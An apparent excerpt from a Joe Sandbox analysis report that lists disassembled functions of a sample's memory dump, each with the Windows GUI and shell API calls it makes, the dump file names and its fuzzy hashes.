Function 00C6C34B Relevance: 7.9, APIs: 5, Instructions: 369windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C6C352
GetWindow.USER32(?,00000005), ref: 00C6C372
GetWindow.USER32(?,00000002), ref: 00C6C3A8
IsWindowVisible.USER32(?), ref: 00C6C48C
GetWindow.USER32(?,00000002), ref: 00C6C71C

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$H_prolog3Visible
String ID:
API String ID: 3969123015-0
Opcode ID: a0ca333cdaaa9a662c3ac81b8d848b5ad346c926256819f77c7cfe2c373257f0
Instruction ID: 34d6e43ba26dbabc79e68d4f220bf7a2d4740c639c6e0aed2040306ee4d9e375
Opcode Fuzzy Hash: a0ca333cdaaa9a662c3ac81b8d848b5ad346c926256819f77c7cfe2c373257f0
Instruction Fuzzy Hash: 31D15D70A002059FCB25EFA4C8D9ABDB7F5BF48300F144569E866EB291DF349E40DB61

Function 00C6AF77 Relevance: 7.7, APIs: 5, Instructions: 227windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C6AF7E
SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00C6AFC5
GetWindow.USER32(00000000,00000005), ref: 00C6AFEC
GetWindow.USER32(?,00000002), ref: 00C6B017
SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00C6B046

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MessageSendWindow$H_prolog3
String ID:
API String ID: 1382076901-0
Opcode ID: d9ea3a1e4d967ede91f6a1808a1b29b4e5191420c1a8d993719c0efa11242e47
Instruction ID: cdedd938e8d5f6feddbe2c54dbd88a5bb7dda5e1965468042aac3e041d0220a7
Opcode Fuzzy Hash: d9ea3a1e4d967ede91f6a1808a1b29b4e5191420c1a8d993719c0efa11242e47
Instruction Fuzzy Hash: 83710471604214AFCB31AB65C8D4BAE7BB4BF45710F1440A9F825EB291DF30DE81DB91

Function 00BF8218 Relevance: 7.7, APIs: 5, Instructions: 182COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00BF8266
InflateRect.USER32(?,00000000,00000000), ref: 00BF8292
GetSystemMetrics.USER32(00000002), ref: 00BF830F
_memset.LIBCMT ref: 00BF8335

Part of subcall function 00BE25F8: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,00BDE5B3,?,00BDE5B3,00000000,?,?,000000FF,000000FF,00000015), ref: 00BE2620

Part of subcall function 00BDCA07: GetScrollInfo.USER32(?,?,?), ref: 00BDCA3B

Part of subcall function 00BDC9C7: SetScrollInfo.USER32(?,?,?,?), ref: 00BDC9F8

EnableScrollBar.USER32(?,00000002,00000000), ref: 00BF8418

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Scroll$InfoRect$ClientEnableInflateMetricsSystemWindow_memset
String ID:
API String ID: 4263531605-0
Opcode ID: 9752756af64e6d12d0953e00a90df344d86fdefe52529db9e0e607014be74693
Instruction ID: 498199341fbe003077975a09fe58ed62773baccb5fae3ce88ebe3072d923341e
Opcode Fuzzy Hash: 9752756af64e6d12d0953e00a90df344d86fdefe52529db9e0e607014be74693
Instruction Fuzzy Hash: 13612871A002199FDB10CFA8C984AFEB7F5FF48700F1441AAE909EB255DBB16905CB64

Function 00C45CDF Relevance: 7.7, APIs: 5, Instructions: 168COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C45D59
EqualRect.USER32(?,?), ref: 00C45D84
BeginDeferWindowPos.USER32(?), ref: 00C45D91
EndDeferWindowPos.USER32(?), ref: 00C45DB6

Part of subcall function 00C39578: GetWindowRect.USER32(?,?), ref: 00C3958E
Part of subcall function 00C39578: GetParent.USER32(?), ref: 00C395D0
Part of subcall function 00C39578: GetParent.USER32(?), ref: 00C395E0

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

GetWindowRect.USER32(?,?), ref: 00C45E6B

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$Rect$DeferParent$BeginEqualException@8H_prolog3Throw
String ID:
API String ID: 601628497-0
Opcode ID: a604b240c277b06aa2958e9215e9b7ff0ce34590993da7b5b0ae9b74320efda5
Instruction ID: 4f3fb466076cfd3132b4fbdca66b0c2687f0685e5f56405f3559135562f40a27
Opcode Fuzzy Hash: a604b240c277b06aa2958e9215e9b7ff0ce34590993da7b5b0ae9b74320efda5
Instruction Fuzzy Hash: D2511971E006099FCB10DFA9C9849EEFBF9FF48310B24456AE515E7212DB35AE41CB61

Function 00C1E445 Relevance: 7.7, APIs: 5, Instructions: 162stringCOMMON

Download Yara Rule

APIs

SHGetPathFromIDListA.SHELL32(?,?), ref: 00C1E4EE
SHGetPathFromIDListA.SHELL32(?,?), ref: 00C1E51E

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

SHGetFileInfoA.SHELL32(?,00000000,?,00000160,00000408), ref: 00C1E5D1
SHGetFileInfoA.SHELL32(?,00000000,?,00000160,00000408), ref: 00C1E5F2
lstrcmpiA.KERNEL32(?,?), ref: 00C1E606

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: FileFromInfoListPath$Exception@8H_prolog3Throwlstrcmpi
String ID:
API String ID: 4171047833-0
Opcode ID: 0792c32b728728175c64dcdcaab0a4c9d415d6ec9ca5ad00d0ecd09d79e6aef2
Instruction ID: bc771d1f49842e0e19bd7da748e6e312244093515def2aa479761e5811fdbf6c
Opcode Fuzzy Hash: 0792c32b728728175c64dcdcaab0a4c9d415d6ec9ca5ad00d0ecd09d79e6aef2
Instruction Fuzzy Hash: BD519BB191022D9BCF258F15CC81AEEB7B9AF1A740F4040DAF909E2151DA70AFC5EF94

Function 00C02E57 Relevance: 7.7, APIs: 5, Instructions: 155timeCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C02E7A
__cftof.LIBCMT ref: 00C02E8E

Part of subcall function 00CC7D9B: __mbsnbcpy_s_l.LIBCMT ref: 00CC7DAE

GetFileTime.KERNEL32(?,?,?,?), ref: 00C02EB8
GetFileSizeEx.KERNEL32(?,?), ref: 00C02ED0

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: File$SizeTime__cftof__mbsnbcpy_s_l_memset
String ID:
API String ID: 1865663784-0
Opcode ID: f3b61879d9c229465f1adc249889249fb35da108d84951fc1fa7996613456147
Instruction ID: 239ddd656d0c888bc6ca6ee978d4ed23656e67010ff03428a4bf53ff5fd6f4e0
Opcode Fuzzy Hash: f3b61879d9c229465f1adc249889249fb35da108d84951fc1fa7996613456147
Instruction Fuzzy Hash: 87514C71A00715AFCB24DFA5C885DAAB7F8FF083507108A2DE5A7D7690EB30E944DB50

Function 00CB6190 Relevance: 7.7, APIs: 5, Instructions: 154COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00CB6197
CreateCompatibleDC.GDI32(00000000), ref: 00CB61E5
GetBoundsRect.GDI32(?,00CB670E,00000000), ref: 00CB620D
CreateSolidBrush.GDI32 ref: 00CB6227
FillRect.USER32(00000000,00CB670E,?), ref: 00CB6240

Part of subcall function 00CB554A: FrameRgn.GDI32(00000000,?,00000000,00CB670E,0000003C), ref: 00CB5572

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: CreateRect$BoundsBrushCompatibleFillFrameH_prolog3_Solid
String ID:
API String ID: 2864772683-0
Opcode ID: 508bf043b1d8a6c7f52aa79edc1e167ad4f255d12fce45efd1c289bd863782f4
Instruction ID: 1f233dd8bbe7891f842fc778d68fe217e539b5b60b14ff6c3ea800c8c6b70b10
Opcode Fuzzy Hash: 508bf043b1d8a6c7f52aa79edc1e167ad4f255d12fce45efd1c289bd863782f4
Instruction Fuzzy Hash: B15189B1C10269EFCF11DFA4C981AEDBBB5FF08710F14006AF811BA291D7B55A85DBA1

Function 00C43304 Relevance: 7.7, APIs: 5, Instructions: 153windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C4330B
RedrawWindow.USER32(?,?,?,00000541), ref: 00C434D1

Part of subcall function 00BE240F: GetWindowLongA.USER32(?,000000F0), ref: 00BE241A

GetSystemMenu.USER32(?,00000000), ref: 00C43345
IsMenu.USER32(?), ref: 00C43364
IsMenu.USER32(?), ref: 00C43372

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Menu$Window$H_prolog3LongRedrawSystem
String ID:
API String ID: 1445310841-0
Opcode ID: 95edbf75b7ada6e0835f95d3b9e8f611e62c45afd60d8bfbf5576b7d7a36468a
Instruction ID: 39baef8e2173b445db95df7acc68fe09948c62b798ea9fd21c1f207ee534577e
Opcode Fuzzy Hash: 95edbf75b7ada6e0835f95d3b9e8f611e62c45afd60d8bfbf5576b7d7a36468a
Instruction Fuzzy Hash: B3519C71A002469BDB15EFB8C846BEEBBF5BF84310F144169E915EB292DF749E01CB60

Function 00C44FF9 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C45028
GetCursorPos.USER32(?), ref: 00C45042
ScreenToClient.USER32(?,?), ref: 00C45052
GetClientRect.USER32(?,?), ref: 00C4507D

Part of subcall function 00BD8095: ClientToScreen.USER32(?,?), ref: 00BD80A6
Part of subcall function 00BD8095: ClientToScreen.USER32(?,?), ref: 00BD80B3

SetRect.USER32(?,?,?,?,?), ref: 00C45134

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Client$RectScreen$CursorWindow
String ID:
API String ID: 3730894386-0
Opcode ID: 5e7c1b22f91e52aa70bfe7ebd859d2f7315f99aade9d6791b27ee42ed8346ba4
Instruction ID: c2bb29fc2fc0601ad9c569f3fa07a2ff965daff6d100913426ca0d62518bac86
Opcode Fuzzy Hash: 5e7c1b22f91e52aa70bfe7ebd859d2f7315f99aade9d6791b27ee42ed8346ba4
Instruction Fuzzy Hash: 4F51E2B5E00609EFCB14CFA9D9C4AAEBBB9FF48304F104129E515A7211DB34AA45CFA0

Function 00C1B4E3 Relevance: 7.6, APIs: 5, Instructions: 129windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00C1B522
ShowWindow.USER32(00000000,00000004), ref: 00C1B554
IsWindow.USER32(?), ref: 00C1B599
IsWindowVisible.USER32(?), ref: 00C1B5A4
ShowWindow.USER32(?,00000000), ref: 00C1B5DF

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$Show$Visible
String ID:
API String ID: 2757229004-0
Opcode ID: 6823c65441cb4eeb9cf6bb93dfa5dd799ea3ee08cfbb05cc36a2ab71b6fee977
Instruction ID: f36ba8c2aac4ab960714f7d89751e03c8bd786e5f74a7536e6da3418934cc990
Opcode Fuzzy Hash: 6823c65441cb4eeb9cf6bb93dfa5dd799ea3ee08cfbb05cc36a2ab71b6fee977
Instruction Fuzzy Hash: DA41AF71200305ABDB14DF65D885BEA37A8AF56350F144029F91ADB181EB30EE80EEA1

Function 00BF7A1D Relevance: 7.6, APIs: 5, Instructions: 123COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,00BD8DDB), ref: 00BF7A4E

Part of subcall function 00BD8095: ClientToScreen.USER32(?,?), ref: 00BD80A6
Part of subcall function 00BD8095: ClientToScreen.USER32(?,?), ref: 00BD80B3

PtInRect.USER32(00BD8DDB,?,?), ref: 00BF7A68
PtInRect.USER32(?,?,?), ref: 00BF7ADB

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ClientRect$Screen
String ID:
API String ID: 3187875807-0
Opcode ID: 1e1beb78807f3478d122be4e9e86653c4cdb426b257dd4e6b0d7fd993e853348
Instruction ID: 120ca653a774a15b2a105f268246427f67130d4fa867def2058dda95818f1b06
Opcode Fuzzy Hash: 1e1beb78807f3478d122be4e9e86653c4cdb426b257dd4e6b0d7fd993e853348
Instruction Fuzzy Hash: 2E411C7190460EEFCF11DFA4C984EBEBBF5FB09300F1444A9E506EB244EA71AA05DB61

Function 00CB661C Relevance: 7.6, APIs: 5, Instructions: 111COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00CB6623
RedrawWindow.USER32(?,00000000,00000000,00000105,0000005C,00CB68E7,?,00CB6A20,?,?,?,00C74737,00000004,?,00000001,?), ref: 00CB6648
GetClientRect.USER32(?,?), ref: 00CB6666
CreateCompatibleDC.GDI32(00CB6A20), ref: 00CB66CE
UpdateLayeredWindow.USER32(?,00000000,00000000,?,?,?,00000000), ref: 00CB672E

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$ClientCompatibleCreateH_prolog3_LayeredRectRedrawUpdate
String ID:
API String ID: 2227077885-0
Opcode ID: 35104321a314dbd4175330f8328286802c3c306bfa31fb5526acd07e7108ac4f
Instruction ID: 8e566add99d7c664349f72353a4695533683e984fa9c020a3638f54f7461e07b
Opcode Fuzzy Hash: 35104321a314dbd4175330f8328286802c3c306bfa31fb5526acd07e7108ac4f
Instruction Fuzzy Hash: 3741F4B1C01218EFCF01EFE4C985AEEBBB9AF18701F10415AF815B6251EB746A45DBA1

Function 00C5AED9 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00BE240F: GetWindowLongA.USER32(?,000000F0), ref: 00BE241A

GetWindowRect.USER32(?,00BF5856), ref: 00C5AF0D
GetSystemMetrics.USER32(00000021), ref: 00C5AF1B
GetSystemMetrics.USER32(00000020), ref: 00C5AF21
GetKeyState.USER32(00000002), ref: 00C5AF41
InflateRect.USER32(00BF5856,00000000,00000000), ref: 00C5AF77

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MetricsRectSystemWindow$InflateLongState
String ID:
API String ID: 2406722796-0
Opcode ID: 0874a006578e5d857ecee0ae96da0fa8373a1b54f16f8b66853baf3da6432991
Instruction ID: f05585da40226ce7d2c0f2dff95076c344c80eba29cb04e841dd954734c20609
Opcode Fuzzy Hash: 0874a006578e5d857ecee0ae96da0fa8373a1b54f16f8b66853baf3da6432991
Instruction Fuzzy Hash: 7931E7B5A002099FCB10DFFAD889BBEB7B4FF48351F14471AE812DB141DA349A84C75A

Function 00BF0DAA Relevance: 7.6, APIs: 5, Instructions: 108windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 00BF0DF9
GetParent.USER32(?), ref: 00BF0E1A
GetParent.USER32(?), ref: 00BF0E4D
UpdateWindow.USER32(?), ref: 00BF0EAF
SendMessageA.USER32(?,00000362,0000E001,00000000), ref: 00BF0EDA

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Parent$FocusMessageSendUpdateWindow
String ID:
API String ID: 2438739141-0
Opcode ID: b32fbefe301be6462fff9deca3eb58f922b06b8a08be17fc7ab42810608fa7f9
Instruction ID: c1965f63c455ac10631039ff705759513fad99f45f7bf3ff55ae80003e0e9e1d
Opcode Fuzzy Hash: b32fbefe301be6462fff9deca3eb58f922b06b8a08be17fc7ab42810608fa7f9
Instruction Fuzzy Hash: F331C371A107049FCB25EB398C44A7E76E6EF94760F250AADE566C72A1EF70DC41CB10

Function 00C4B603 Relevance: 7.6, APIs: 5, Instructions: 102windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00001014,?,00000000), ref: 00C4B6D9
SendMessageA.USER32(?,00000114,?,00000000), ref: 00C4B6E9
SetScrollPos.USER32(?,00000002,00000000,00000001), ref: 00C4B707
GetParent.USER32(?), ref: 00C4B717
SendMessageA.USER32(?,?,00000000,00000000), ref: 00C4B72F

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MessageSend$ParentScroll
String ID:
API String ID: 375824706-0
Opcode ID: f1453998adf20c8e866ee1b9056ec7490a6f215a289a21d8a1b8d6aa3ecfd28f
Instruction ID: 07965c967a35832fc70fb1634fca4657dc0d6128cf52f3c8df444d617a29fa9b
Opcode Fuzzy Hash: f1453998adf20c8e866ee1b9056ec7490a6f215a289a21d8a1b8d6aa3ecfd28f
Instruction Fuzzy Hash: 6831AF71200705AFDB249F24CCC5FAA7BA5FF84300F114569F66A8B2A1D770ED90DB60

Function 00BEE437 Relevance: 7.6, APIs: 5, Instructions: 99COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00BEE460
ScreenToClient.USER32(?,?), ref: 00BEE490
SetCursor.USER32 ref: 00BEE4D9
ScreenToClient.USER32(?,?), ref: 00BEE4F9
PtInRect.USER32(?,?,?), ref: 00BEE522

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ClientCursorScreen$Rect
String ID:
API String ID: 1082406499-0
Opcode ID: d10404620c7ac155e8543e6a2bfb04d8f3cffee1815d0da1eb4b39817b1a485c
Instruction ID: a5f1d7cf47536e4317e032f922b5c43a3b899ae8132840f84d0dfa1fe0c95478
Opcode Fuzzy Hash: d10404620c7ac155e8543e6a2bfb04d8f3cffee1815d0da1eb4b39817b1a485c
Instruction Fuzzy Hash: DB315CB1900249DFCB20DFA6D8C49AEBBF5FB08314F10446AE516E7261DB34EA01DF61

Function 00BF0EE8 Relevance: 7.6, APIs: 5, Instructions: 99COMMON

Download Yara Rule

APIs

CallNextHookEx.USER32(00000000,?,?), ref: 00BF0F04
WindowFromPoint.USER32(?,?), ref: 00BF0F2F
ScreenToClient.USER32(?,00000000), ref: 00BF0F60
GetParent.USER32(?), ref: 00BF0FCE
UpdateWindow.USER32(?), ref: 00BF1026

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$CallClientFromHookNextParentPointScreenUpdate
String ID:
API String ID: 160110263-0
Opcode ID: 7bd4364ee89034073b6b12c282cb8b49070771de6c3ed8f0e40930b456d101c3
